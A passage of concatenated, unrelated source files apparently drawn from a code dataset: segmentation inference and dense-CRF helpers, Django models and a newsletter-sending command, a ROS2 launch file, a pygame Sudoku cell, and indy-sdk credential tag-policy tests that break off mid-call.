            # Bug fix (mirrors predict_scaler): when classes == 1, cv2.resize
            # collapses the channel axis; restore it so the accumulation
            # below broadcasts against (H, W, 1) instead of failing.
            probs = probs[:, :, None]
        full_probs += probs
    full_probs /= len(scales)
    if is_densecrf:
        full_probs = dense_crf(full_probs, sxy_bilateral=(67, 67), srgb_bilateral=(3, 3, 3), n_iters=10)
    return full_probs
def predict_slider(full_image, predictor, classes, tile_size, overlap = 1.0/3):
    """Sliding-window inference over ``full_image``.

    Overlapping square tiles are padded up to the fixed network input size
    (``pad_image``), run through ``predictor``, and the per-class
    probabilities are accumulated and averaged over the overlapping regions.

    Args:
        full_image: H x W x C image array.
        predictor: callable mapping a padded tile to an H x W x classes
            prediction.  NOTE(review): unlike edge_predict_slider this is fed
            the unbatched tile — confirm the predictor's expected shape.
        classes: number of output classes.
        tile_size: int side length or (h, w) tuple of the window.
        overlap: fraction of overlap between neighbouring windows.

    Returns:
        H x W x classes array of averaged class probabilities.
    """
    if isinstance(tile_size, int):
        tile_size = (tile_size, tile_size)
    stride = ceil(tile_size[0] * (1 - overlap))
    tile_rows = int(ceil((full_image.shape[0] - tile_size[0]) / stride) + 1)  # strided convolution formula
    tile_cols = int(ceil((full_image.shape[1] - tile_size[1]) / stride) + 1)
    full_probs = np.zeros((full_image.shape[0], full_image.shape[1], classes))
    count_predictions = np.zeros((full_image.shape[0], full_image.shape[1], classes))
    for row in range(tile_rows):
        for col in range(tile_cols):
            x1 = int(col * stride)
            y1 = int(row * stride)
            x2 = min(x1 + tile_size[1], full_image.shape[1])
            y2 = min(y1 + tile_size[0], full_image.shape[0])
            # Re-anchor the window so it never runs off the image edge.
            x1 = max(int(x2 - tile_size[1]), 0)  # for portrait images the x1 underflows sometimes
            y1 = max(int(y2 - tile_size[0]), 0)  # for very few rows y1 underflows
            img = full_image[y1:y2, x1:x2]
            # Padding only happens when the image is already smaller than tile_size.
            padded_img, padding_index = pad_image(img, tile_size)
            padded_prediction = predictor(padded_img)
            # Crop away the padding before accumulating.
            prediction_no_padding = padded_prediction[padding_index[0]:padding_index[1],
                                                      padding_index[2]:padding_index[3], :]
            count_predictions[y1:y2, x1:x2] += 1
            full_probs[y1:y2, x1:x2] += prediction_no_padding  # accumulate the predictions also in the overlapping regions
    # Average the predictions in the overlapping regions.  The window
    # arithmetic above covers every pixel at least once, so
    # count_predictions has no zeros; the previous try/except around this
    # division existed only to drop into an IPython shell for debugging
    # (numpy float division never raises here anyway) and has been removed,
    # along with the unused tile_counter.
    full_probs /= count_predictions
    return full_probs
def predict_scaler(full_image, predictor, scales, classes, tile_size, is_densecrf,overlap=1.0/3):
    """Average sliding-window predictions over several rescaled copies of the image.

    Each scale factor resizes the image, runs :func:`predict_slider`, and
    resizes the probability map back to the original resolution; the maps
    are then averaged and optionally refined with a dense CRF.
    """
    h_ori, w_ori = full_image.shape[:2]
    accumulated = np.zeros((h_ori, w_ori, classes), dtype=np.float32)
    for factor in scales:
        resized = cv2.resize(full_image, (int(factor * w_ori), int(factor * h_ori)))
        scale_probs = predict_slider(resized, predictor, classes, tile_size, overlap)
        restored = cv2.resize(scale_probs, (w_ori, h_ori))
        if scale_probs.shape[-1] == 1:
            # cv2.resize drops a singleton channel axis; put it back so the
            # accumulation below keeps its (H, W, 1) shape.
            restored = restored[:, :, None]
        accumulated += restored
    accumulated /= len(scales)
    if is_densecrf:
        accumulated = dense_crf(accumulated, sxy_bilateral=(67, 67), srgb_bilateral=(10, 10, 10), n_iters=10)
    return accumulated
def visualize_feat_sigmoid(img,predictor,top_k=3):
    """Colour-map the top_k feature channels of predictor(img).

    Channels are ranked (descending) by their matrix 1-norm, squashed
    through a sigmoid, scaled to [0, 255] and rendered with the JET
    colormap.  Returns a list of top_k uint8 BGR heatmaps.
    """
    def _sigmoid(x, derivative=False):
        return x * (1 - x) if derivative else 1 / (1 + np.exp(-x))

    feat = predictor(img)
    channels = [feat[:, :, c] for c in range(feat.shape[-1])]
    channels.sort(key=lambda ch: np.linalg.norm(ch, 1), reverse=True)
    heatmaps = []
    for ch in channels[:top_k]:
        scaled = (_sigmoid(ch) * 255).astype(np.uint8)
        # JET colormap reference: https://blog.csdn.net/loveliuzz/article/details/73648505
        heatmaps.append(cv2.applyColorMap(scaled, cv2.COLORMAP_JET))
    return heatmaps
def visualize_feat(img,predictor):
    """Render every feature channel of predictor(img) as a JET heatmap.

    For each channel the returned list contains two entries in order: the
    JET-coloured uint8 heatmap, then the min-max normalised grey mask
    replicated to three (float) channels.
    """
    feat = predictor(img)
    rendered = []
    for c in range(feat.shape[-1]):
        channel = feat[:, :, c]
        # Min-max normalise into [0, 255].  NOTE(review): a constant channel
        # makes the denominator zero — confirm inputs always vary.
        norm = (channel - np.min(channel)) * 255 / (np.max(channel) - np.min(channel))
        grey_mask = norm[:, :, np.newaxis] * np.ones((1, 1, 3))
        # JET colormap reference: https://blog.csdn.net/loveliuzz/article/details/73648505
        heatmap = cv2.applyColorMap(norm.astype(np.uint8), cv2.COLORMAP_JET)
        rendered.append(heatmap)
        rendered.append(grey_mask)
    return rendered
def visualize_feat_relative(img,predictor,top_k=5):
    """Colour-map the top_k feature channels of predictor(img), ranked by total activation.

    Each selected channel is min-max normalised to [0, 255] and rendered
    with the JET colormap; returns a list of top_k uint8 BGR heatmaps.
    """
    feat = predictor(img)
    by_activation = sorted(
        (feat[:, :, c] for c in range(feat.shape[-1])),
        key=np.sum,
        reverse=True,
    )
    heatmaps = []
    for channel in by_activation[:top_k]:
        span = np.max(channel) - np.min(channel)
        norm = ((channel - np.min(channel)) * 255 / span).astype(np.uint8)
        # JET colormap reference: https://blog.csdn.net/loveliuzz/article/details/73648505
        heatmaps.append(cv2.applyColorMap(norm, cv2.COLORMAP_JET))
    return heatmaps
def dense_crf(probs, img=None, n_iters=10,
              sxy_gaussian=(1, 1), compat_gaussian=4,
              kernel_gaussian=dcrf.DIAG_KERNEL,
              normalisation_gaussian=dcrf.NORMALIZE_SYMMETRIC,
              sxy_bilateral=(49, 49), compat_bilateral=5,
              srgb_bilateral=(13, 13, 13),
              kernel_bilateral=dcrf.DIAG_KERNEL,
              normalisation_bilateral=dcrf.NORMALIZE_SYMMETRIC):
    """DenseCRF over unnormalised predictions.
       More details on the arguments at https://github.com/lucasb-eyer/pydensecrf.
    Args:
      probs: class probabilities per pixel.
      img: if given, the pairwise bilateral potential on raw RGB values will be computed.
      n_iters: number of iterations of MAP inference.
      sxy_gaussian: standard deviations for the location component of the colour-independent term.
      compat_gaussian: label compatibilities for the colour-independent term (can be a number, a 1D array, or a 2D array).
      kernel_gaussian: kernel precision matrix for the colour-independent term (can take values CONST_KERNEL, DIAG_KERNEL, or FULL_KERNEL).
      normalisation_gaussian: normalisation for the colour-independent term (possible values are NO_NORMALIZATION, NORMALIZE_BEFORE, NORMALIZE_AFTER, NORMALIZE_SYMMETRIC).
      sxy_bilateral: standard deviations for the location component of the colour-dependent term.
      compat_bilateral: label compatibilities for the colour-dependent term (can be a number, a 1D array, or a 2D array).
      srgb_bilateral: standard deviations for the colour component of the colour-dependent term.
      kernel_bilateral: kernel precision matrix for the colour-dependent term (can take values CONST_KERNEL, DIAG_KERNEL, or FULL_KERNEL).
      normalisation_bilateral: normalisation for the colour-dependent term (possible values are NO_NORMALIZATION, NORMALIZE_BEFORE, NORMALIZE_AFTER, NORMALIZE_SYMMETRIC).
    Returns:
      Refined predictions after MAP inference.
    """
    h, w, class_num = probs.shape
    # pydensecrf expects class-major (C, H, W) data.
    probs = probs.transpose(2, 0, 1).copy(order='C')  # Need a contiguous array.
    d = dcrf.DenseCRF2D(w, h, class_num)  # Define DenseCRF model.
    # NOTE: -log(0) is inf, so zero probabilities produce infinite unary
    # potentials; callers are expected to pass strictly positive probs.
    U = -np.log(probs)  # Unary potential.
    U = U.reshape((class_num, -1)).astype(np.float32)  # Needs to be flat.
    d.setUnaryEnergy(U)
    d.addPairwiseGaussian(sxy=sxy_gaussian, compat=compat_gaussian,
                          kernel=kernel_gaussian, normalization=normalisation_gaussian)
    if img is not None:
        # The shape check and img[0] below imply img carries a leading batch
        # axis with the RGB frame at index 0 — TODO confirm against callers.
        assert (img.shape[1:3] == (h, w)), "The image height and width must coincide with dimensions of the logits."
        d.addPairwiseBilateral(sxy=sxy_bilateral, compat=compat_bilateral,
                               kernel=kernel_bilateral, normalization=normalisation_bilateral,
                               srgb=srgb_bilateral, rgbim=img[0])
    Q = d.inference(n_iters)
    # Back to pixel-major (H, W, C) layout.
    preds = np.array(Q, dtype=np.float32).reshape((class_num, h, w)).transpose(1, 2, 0)
    return preds
def predict_from_dir(mypredictor,image_dir,target_dir,CLASS_NUM,CROP_SIZE,is_densecrf, image_format="jpg",overlap=1.0/3):
    """Segment every image in ``image_dir`` and write side-by-side visualisations.

    For each file, runs multi-scale sliding-window inference
    (scales 0.9/1.0/1.1), takes the per-pixel argmax, and writes the source
    image concatenated with the colourised label map to ``target_dir``
    under the same filename.

    Args:
        mypredictor: callable passed through to predict_scaler.
        image_dir: directory whose entries are read with cv2.imread.
        target_dir: output directory for the visualisation images.
        CLASS_NUM: number of segmentation classes.
        CROP_SIZE: sliding-window tile size.
        is_densecrf: whether to apply dense-CRF refinement.
        image_format: unused; kept for backward compatibility of the signature.
        overlap: sliding-window overlap fraction.
    """
    from tqdm import tqdm
    for entry in tqdm(os.listdir(image_dir)):
        filename = os.path.basename(entry)
        logger.info("process {}.".format(filename))
        src_img = cv2.imread(os.path.join(image_dir, entry))
        result = predict_scaler(src_img, mypredictor, scales=[0.9, 1, 1.1], classes=CLASS_NUM,
                                tile_size=CROP_SIZE, is_densecrf=is_densecrf, overlap=overlap)
        # Removed the unused `extension` local (filename.rsplit(".")[-1]) —
        # it was computed and never read.
        labels = np.argmax(result, axis=2)
        cv2.imwrite(os.path.join(target_dir, filename),
                    np.concatenate((src_img, visualize_label(labels)), axis=1))
if __name__ == '__main__':
    # Ad-hoc scratch code for experimenting with confusion-matrix and
    # fancy-indexing behaviour; not part of the library API.
    label = np.array([1,1,1,0,0,0,0])
    pred = np.array([0,0,0,0,0,0,0])
    cm = np.array([[0,0],[0,0]])
    #cm = update_confusion_matrix(pred,label,cm,2)
    prob = np.random.rand(10,10,3)
    gt = np.ones((10,10,1),dtype=np.uint8)
    # In-place reshape: flatten the 10x10 maps to (100, 3) and (100,).
    prob.resize((100,3))
    gt.resize((100))
    gt_idx = np.where(gt>-1)[0]
    # Fancy-indexing experiment: pick prob[pixel, class] pairs via a
    # stacked (2, N) index array.
    idx = np.vstack((gt_idx,gt))
    tmp = prob[list(idx)]
    t = prob[[1,2,3],[2,0,0]]
    pass
| StarcoderdataPython |
1770247 | <reponame>Gabr0/randomtestspython<filename>reversedstr.py<gh_stars>0
class ReversedStr(str):
    """A ``str`` subclass whose value is the reverse of the text it was built from.

    ``ReversedStr("abc") == "cba"``.  Accepts the same constructor arguments
    as ``str``.
    """
    def __new__(cls, *args, **kwargs):
        # Build the forward string first, then reverse it *before* the final
        # __new__ call.  The original implementation reversed after
        # construction (`self = self[::-1]`), but slicing a str subclass
        # returns a plain str, so instances were never actually ReversedStr.
        forward = str.__new__(str, *args, **kwargs)
        return str.__new__(cls, forward[::-1])
| StarcoderdataPython |
9735126 | from django.db import models
from django.contrib.auth.models import User
from translation_app.models import Origin
from file_app.models import UserIcon, AchievementIcon
# Create your models here.
class UserProfile(models.Model):
    """Extended profile attached one-to-one to the Django auth ``User``.

    Carries a free-text bio, earned achievements, bookmarked ``Origin``
    entries ("on hold"), and an optional avatar icon.
    """
    description = models.TextField('О себе', max_length=1000, blank=True, null=True)
    user = models.OneToOneField(User, related_name='user_profile',
                                verbose_name='Основной пользователь', on_delete=models.CASCADE)
    achievements = models.ManyToManyField('Achievement', verbose_name='Достижения', related_name='user_profile_set',
                                          blank=True)
    on_hold = models.ManyToManyField(Origin, verbose_name='Отложенное', related_name='user_profile_set', blank=True)
    # SET_NULL keeps the profile if its icon record is deleted.
    profile_icon = models.ForeignKey(UserIcon, verbose_name='Аватарка', on_delete=models.SET_NULL,
                                     blank=True, null=True)
    class Meta:
        verbose_name = 'Профиль пользователя'
        verbose_name_plural = 'Профили пользователей'
    def __str__(self):
        return self.user.username
class Achievement(models.Model):
    """An award that can be granted to user profiles, with a cost/value and icon."""
    name = models.CharField('Название', max_length=30)
    description = models.TextField('Описание', max_length=500, blank=True, null=True)
    rate = models.IntegerField('Стоимость', default=1)
    # SET_NULL keeps the achievement if its icon record is deleted.
    icon = models.ForeignKey(AchievementIcon, verbose_name='Иконка', on_delete=models.SET_NULL,
                             blank=True, null=True)
    class Meta:
        verbose_name = 'Достижение'
        verbose_name_plural = 'Достижения'
        ordering = ['name']
    def __str__(self):
        return self.name
| StarcoderdataPython |
12807688 | #!/usr/bin/env python
# Copyright 1996-2019 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Launch Webots and the controller."""
import os
from pathlib import Path
import launch
import launch_ros.actions
from launch.actions import IncludeLaunchDescription
from launch.launch_description_sources import PythonLaunchDescriptionSource
from ament_index_python.packages import get_package_share_directory
def generate_launch_description():
    """Launch Webots with the Universal Robot world plus an RViz view."""
    package_dir = get_package_share_directory('webots_ros2_universal_robot')

    # Webots, started through the shared webots_ros2_core robot launch file.
    webots = IncludeLaunchDescription(
        PythonLaunchDescriptionSource(
            os.path.join(get_package_share_directory('webots_ros2_core'), 'launch', 'robot_launch.py')
        ),
        launch_arguments={
            'executable': 'webots_robotic_arm_node',
            'world': os.path.join(package_dir, 'worlds', 'universal_robot.wbt'),
        }.items()
    )

    # Copy the packaged .rviz config into the home directory once, rewriting
    # the package:// URI into an absolute path so RViz can resolve the URDF.
    description_dir = get_package_share_directory('webots_ros2_ur_e_description')
    template_rviz = os.path.join(description_dir, 'rviz', 'view_robot') + '.rviz'
    home = Path.home()
    custom_rviz = os.path.join(home, 'webots_ros2_ur_e_description.rviz')
    if not os.path.exists(os.path.join(home, 'webots_ros2_ur_e_description.rviz')):
        with open(template_rviz, 'r') as template:
            contents = template.read()
        contents = contents.replace('package://webots_ros2_ur_e_description', description_dir)
        with open(custom_rviz, 'w') as target:
            target.write(contents)

    # RViz node, pointed at the customised config file.
    rviz = launch_ros.actions.Node(package='rviz2',
                                   node_executable='rviz2',
                                   arguments=['-d', custom_rviz],
                                   output='screen')

    return launch.LaunchDescription([
        rviz,
        webots
    ])
| StarcoderdataPython |
12855413 | import pygame
from gui_components.gui_util import get_font, BLACK, BLUE, GRAY
class Cell:
    """One square of a 9x9 puzzle grid (presumably Sudoku, given the /9 layout).

    Holds the committed value, a pencilled-in temporary value, the cell's
    grid position, and the board dimensions used to derive the size of a
    single square when drawing.
    """
    def __init__(self, value, row, col, width, height):
        self.value = value          # committed digit (0 = empty)
        self.temp = 0               # pencilled-in candidate digit
        self.row = row
        self.col = col
        self.width = width          # board width in pixels
        self.height = height        # board height in pixels
        self.set_by_user = False    # True when the player filled this cell
        self.selected = False       # highlight state

    def draw(self, win):
        """Render the cell's digit or pencil mark, plus a selection border, on win."""
        font = get_font("arial", 40)
        gap = self.width / 9
        x = self.col * gap
        y = self.row * gap
        has_value = self.value != 0
        if self.temp != 0 and not has_value:
            # Pencil mark: small grey hint near the cell's top-right corner.
            hint = font.render(str(self.temp), 1, GRAY)
            win.blit(hint, (x + 45, y + 5))
        elif has_value:
            # User-entered digits are blue, pre-set digits black.
            colour = BLUE if self.set_by_user else BLACK
            digit = font.render(str(self.value), 1, colour)
            win.blit(digit, (x + (gap / 2 - digit.get_width() / 2),
                             y + (gap / 2 - digit.get_height() / 2)))
        if self.selected:
            pygame.draw.rect(win, BLUE, (x, y, gap, gap), 5)

    def set_value(self, val, set_by_user: bool = False):
        """Commit val to the cell, clearing any pencil mark."""
        self.value = val
        self.temp = 0
        self.set_by_user = set_by_user

    def set_temp(self, val):
        """Pencil in val, clearing the committed value."""
        self.value = 0
        self.temp = val
| StarcoderdataPython |
11356301 | <reponame>sirodoht/mataroa<gh_stars>10-100
from datetime import timedelta
from django.conf import settings
from django.core import mail
from django.core.management.base import BaseCommand
from django.utils import timezone
from main import models, util
def get_mail_connection():
    """Returns the default EmailBackend but instantiated with a custom host."""
    backend_path = "django.core.mail.backends.smtp.EmailBackend"
    return mail.get_connection(backend_path, host=settings.EMAIL_HOST_BROADCASTS)
def get_email_body(post, notification):
    """Compose the plain-text newsletter body (post title, link, full text,
    and the per-subscriber unsubscribe link)."""
    post_url = util.get_protocol() + post.get_proper_url()
    unsubscribe_url = util.get_protocol() + notification.get_unsubscribe_url()
    blog_title = post.owner.blog_title or post.owner.username
    segments = [
        f"{blog_title} has published a new blog post titled:",
        post.title,
        "",
        "Find the complete text at:",
        post_url,
        "",
        "Or read it below:",
        "",
        "# " + post.title,
        "",
        post.body,
        "",
        "---",
        "",
        f"Read at {post_url}",
        "",
        "---",
        "",
        "To unsubscribe click at:",
        unsubscribe_url,
    ]
    # Join with newlines and keep the trailing newline of the original format.
    return "\n".join(segments) + "\n"
def get_email(post, notification):
    """Returns the email object, containing all info needed to be sent."""
    blog_title = post.owner.blog_title or post.owner.username
    unsubscribe_url = util.get_protocol() + notification.get_unsubscribe_url()
    sender = f"{blog_title} <{post.owner.username}@{settings.EMAIL_FROM_HOST}>"
    # Postmark newsletter stream plus one-click unsubscribe headers.
    headers = {
        "X-PM-Message-Stream": "newsletters",
        "List-Unsubscribe": unsubscribe_url,
        "List-Unsubscribe-Post": "List-Unsubscribe=One-Click",
    }
    return mail.EmailMessage(
        subject=post.title,
        body=get_email_body(post, notification),
        from_email=sender,
        to=[notification.email],
        reply_to=[post.owner.email],
        headers=headers,
    )
class Command(BaseCommand):
    """Management command that prunes stale notification records and, at the
    13:00 UTC window, mass-sends newsletter emails for posts published the
    previous day."""
    help = "Processes new posts and sends email to subscribers"
    def handle(self, *args, **options):
        """Process pending NotificationRecord rows.

        Outside 13:00 UTC only cleanup runs (deleting records whose post was
        removed, drafted, opted out of notifications, or whose subscriber
        unsubscribed).  At 13:00 UTC, records for posts published yesterday
        are also built into emails, sent in one batch, and stamped with
        sent_at.
        """
        # if false, then we do not actually send emails,
        # only process the ones to be canceled
        send_mode = True
        if timezone.now().hour != 13:
            msg = "Current UTC not 13:00. Will not send emails, only process canceled."
            self.stdout.write(self.style.NOTICE(msg))
            send_mode = False
        self.stdout.write(self.style.NOTICE("Processing notifications."))
        # list of messages to sent out
        message_list = []
        # get all notification records without sent_at
        # which means they have not been sent out already
        notification_records = models.NotificationRecord.objects.filter(sent_at=None)
        for record in notification_records:
            # if post has been deleted
            # TODO: test case for this conditional
            if not record.post:
                # delete record
                msg = (
                    f"Delete as post does not exist: for '{record.notification.email}'."
                )
                self.stdout.write(self.style.NOTICE(msg))
                record.delete()
                continue
            # don't send, if blog has turned notifications off
            if not record.post.owner.notifications_on:
                # also delete record
                msg = f"Delete as notifications off: '{record.post.title}' for '{record.notification.email}'."
                self.stdout.write(self.style.NOTICE(msg))
                record.delete()
                continue
            # don't send, if email has unsubscribed since records were enqueued
            if not record.notification.is_active:
                # also delete record
                msg = f"Delete as email has unsubscribed: '{record.post.title}' for '{record.notification.email}'."
                self.stdout.write(self.style.NOTICE(msg))
                record.delete()
                continue
            # don't send, if post is on draft status
            if not record.post.published_at:
                # also delete record
                msg = f"Delete as post is now a draft: '{record.post.title}' for '{record.notification.email}'."
                self.stdout.write(self.style.NOTICE(msg))
                record.delete()
                continue
            # don't send, if post publication date is not the day before
            yesterday = timezone.now().date() - timedelta(days=1)
            if record.post.published_at != yesterday:
                msg = f"Skip as pub date is not yesterday: '{record.post.title}' for '{record.notification.email}'."
                self.stdout.write(self.style.NOTICE(msg))
                continue
            # don't send, if notification record is canceled
            if record.is_canceled:
                msg = f"Skip as record is canceled: '{record.post.title}' for '{record.notification.email}'."
                self.stdout.write(self.style.NOTICE(msg))
                continue
            # don't queue for sending, if send mode is off
            if not send_mode:
                continue
            # add email object to list
            email = get_email(record.post, record.notification)
            message_list.append(email)
            # log time email was added to the send-out list
            # ideally we would like to log when each one was sent
            # which is infeasible given the mass send strategy of newsletters
            record.sent_at = timezone.now()
            record.save()
            msg = f"Logging record for '{record.post.title}' to '{record.notification.email}'."
            self.stdout.write(self.style.SUCCESS(msg))
        # return if send mode is off
        if not send_mode:
            self.stdout.write(
                self.style.SUCCESS("Notifications processed. No emails were sent.")
            )
            return
        # sent out messages
        connection = get_mail_connection()
        connection.send_messages(message_list)
        self.stdout.write(
            self.style.SUCCESS(f"Broadcast sent. Total {len(message_list)} emails.")
        )
| StarcoderdataPython |
3540530 | <reponame>absltkaos/indy-sdk
import json
import pytest
from indy import anoncreds, error
async def _check_catpol(wallet_handle, cred_def_json, cred_def_id, cred_id, cred_value, offer_json, cred_req,
                        cred_req_metadata, taggables, retroactive, query_attrs, expect_cred_ids, expect_policy):
    """Set a credential attribute tag policy, store a credential, then verify
    both the searchability of stored credentials and the stored policy.

    Args:
        taggables: JSON list of attribute names to tag, or None for the
            default (tag-all) policy.
        retroactive: whether the policy is applied to already-stored credentials.
        query_attrs: attributes included in the marker+value WQL search below.
        expect_cred_ids: set of credential ids the search must return
            (None means the search must return nothing).
        expect_policy: set of attrs the stored policy must equal
            (None means the null/default policy is expected).
    """
    # Set policy
    await anoncreds.prover_set_credential_attr_tag_policy(wallet_handle, cred_def_id, taggables, retroactive)
    # Write credential
    (cred, _, _) = await anoncreds.issuer_create_credential(wallet_handle, offer_json, cred_req,
                                                            json.dumps(cred_value), None, None)
    await anoncreds.prover_store_credential(wallet_handle, cred_id, cred_req_metadata, cred, cred_def_json, None)
    # Search on all tags
    query_json = json.dumps({
        **{'attr::{}::marker'.format(attr): '1' for attr in query_attrs},
        **{'attr::{}::value'.format(attr): cred_value[attr]['raw'] for attr in query_attrs},
    })
    (handle, count) = await anoncreds.prover_search_credentials(wallet_handle, query_json)
    found = json.loads(
        await anoncreds.prover_fetch_credentials(handle, count))
    assert {cred['referent'] for cred in found} == (expect_cred_ids or set())
    await anoncreds.prover_close_credentials_search(handle)
    # Get and check current policy
    catpol = json.loads(await anoncreds.prover_get_credential_attr_tag_policy(wallet_handle, cred_def_id))
    if expect_policy is None:
        assert catpol is None
    else:
        assert set(catpol) == expect_policy
async def _check_query(wallet_handle, cred_value, attr, expect_cred_ids):
    """Search the wallet on a single attribute's marker+value tags and
    assert the returned credential ids match expect_cred_ids (None = none)."""
    query = {
        'attr::{}::marker'.format(attr): '1',
        'attr::{}::value'.format(attr): cred_value[attr]['raw'],
    }
    (search_handle, total) = await anoncreds.prover_search_credentials(wallet_handle, json.dumps(query))
    fetched = json.loads(await anoncreds.prover_fetch_credentials(search_handle, total))
    assert {cred['referent'] for cred in fetched} == (expect_cred_ids or set())
    await anoncreds.prover_close_credentials_search(search_handle)
# noinspection PyUnusedLocal
@pytest.mark.asyncio
async def test_prover_credential_attr_tag_policy(wallet_handle, prepopulated_wallet, issuer_1_gvt_cred_def_id):
    """End-to-end exercise of credential attribute tag policies.

    Walks through null / empty / one-attr / all-but-one / explicit-all
    policies in three phases: set non-retroactively on a wallet without
    matching credentials, set retroactively, then set non-retroactively
    with pre-existing credentials.  Finally restores the wallet state by
    deleting every credential the test created.
    """
    # Five credential payloads, varying per index i.
    cred_values = {
        i: {
            'sex': {
                'raw': ('male', 'female')[i % 2],
                'encoded': ('123456789012', '135791357902')[i % 2]
            },
            'name': {
                'raw': ('Wayne', 'Hailey', 'Sidney', 'Cammi', 'Connor')[i],
                'encoded': ('987654321098', '876543210987', '765432109876', '654321098765', '543210987654')[i]
            },
            'height': {
                'raw': ('180', '160', '183', '161', '192')[i],
                'encoded': ('180', '160', '183', '161', '192')[i]
            },
            'age': {
                'raw': str(60 + i),
                'encoded': str(60 + i)
            }
        } for i in range(5)
    }
    (cred_def_json, offer_json, cred_req, cred_req_metadata) = prepopulated_wallet[0:4]
    # SET POLICY NON-RETROACTIVELY when wallet has no credentials of interest
    # Null policy (default, all attrs)
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-0.0',
                        cred_value=cred_values[0],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=None,
                        retroactive=False,
                        query_attrs=[attr for attr in cred_values[0]],
                        expect_cred_ids={'cred-0.0'},
                        expect_policy=None)
    # No-attrs policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-0.1',
                        cred_value=cred_values[1],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps([]),
                        retroactive=False,
                        query_attrs=['name'],
                        expect_cred_ids=None,
                        expect_policy=set())
    # One-attr policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-0.2',
                        cred_value=cred_values[2],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps(['name']),
                        retroactive=False,
                        query_attrs=['name'],
                        expect_cred_ids={'cred-0.2'},
                        expect_policy={'name'})
    await _check_query(wallet_handle=wallet_handle,  # also ensure wallet does not tag untaggable attrs
                       cred_value=cred_values[2],
                       attr='age',
                       expect_cred_ids=None)
    # All-but-one-attr policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-0.3',
                        cred_value=cred_values[3],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps(['sex', 'height', 'age']),
                        retroactive=False,
                        query_attrs=['sex', 'height', 'age'],
                        expect_cred_ids={'cred-0.3'},
                        expect_policy={'sex', 'height', 'age'})
    await _check_query(wallet_handle=wallet_handle,  # also ensure wallet does not tag untaggable attrs
                       cred_value=cred_values[3],
                       attr='name',
                       expect_cred_ids=None)
    # Explicit all-attrs policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-0.4',
                        cred_value=cred_values[4],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps([attr for attr in cred_values[4]]),
                        retroactive=False,
                        query_attrs=[attr for attr in cred_values[4]],
                        expect_cred_ids={'cred-0.4'},
                        expect_policy={attr for attr in cred_values[4]})
    # SET POLICY RETROACTIVELY
    # Null policy (default, all attrs)
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-1.0',
                        cred_value=cred_values[0],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=None,
                        retroactive=True,
                        query_attrs=[attr for attr in cred_values[0]],
                        expect_cred_ids={'cred-0.0', 'cred-1.0'},
                        expect_policy=None)
    # No-attrs policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-1.1',
                        cred_value=cred_values[1],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps([]),
                        retroactive=True,
                        query_attrs=['name'],
                        expect_cred_ids=None,
                        expect_policy=set())
    # One-attr policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-1.2',
                        cred_value=cred_values[2],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps(['name']),
                        retroactive=True,
                        query_attrs=['name'],
                        expect_cred_ids={'cred-0.2', 'cred-1.2'},
                        expect_policy={'name'})
    await _check_query(wallet_handle=wallet_handle,  # also ensure wallet does not tag untaggable attrs
                       cred_value=cred_values[2],
                       attr='age',
                       expect_cred_ids=None)
    # All-but-one-attr policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-1.3',
                        cred_value=cred_values[3],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps(['sex', 'height', 'age']),
                        retroactive=True,
                        query_attrs=['sex', 'height', 'age'],
                        expect_cred_ids={'cred-0.3', 'cred-1.3'},
                        expect_policy={'sex', 'height', 'age'})
    await _check_query(wallet_handle=wallet_handle,  # also ensure wallet does not tag untaggable attrs
                       cred_value=cred_values[3],
                       attr='name',
                       expect_cred_ids=None)
    # Explicit all-attrs policy
    await _check_catpol(wallet_handle=wallet_handle,
                        cred_def_json=cred_def_json,
                        cred_def_id=issuer_1_gvt_cred_def_id,
                        cred_id='cred-1.4',
                        cred_value=cred_values[4],
                        offer_json=offer_json,
                        cred_req=cred_req,
                        cred_req_metadata=cred_req_metadata,
                        taggables=json.dumps([attr for attr in cred_values[4]]),
                        retroactive=True,
                        query_attrs=[attr for attr in cred_values[4]],
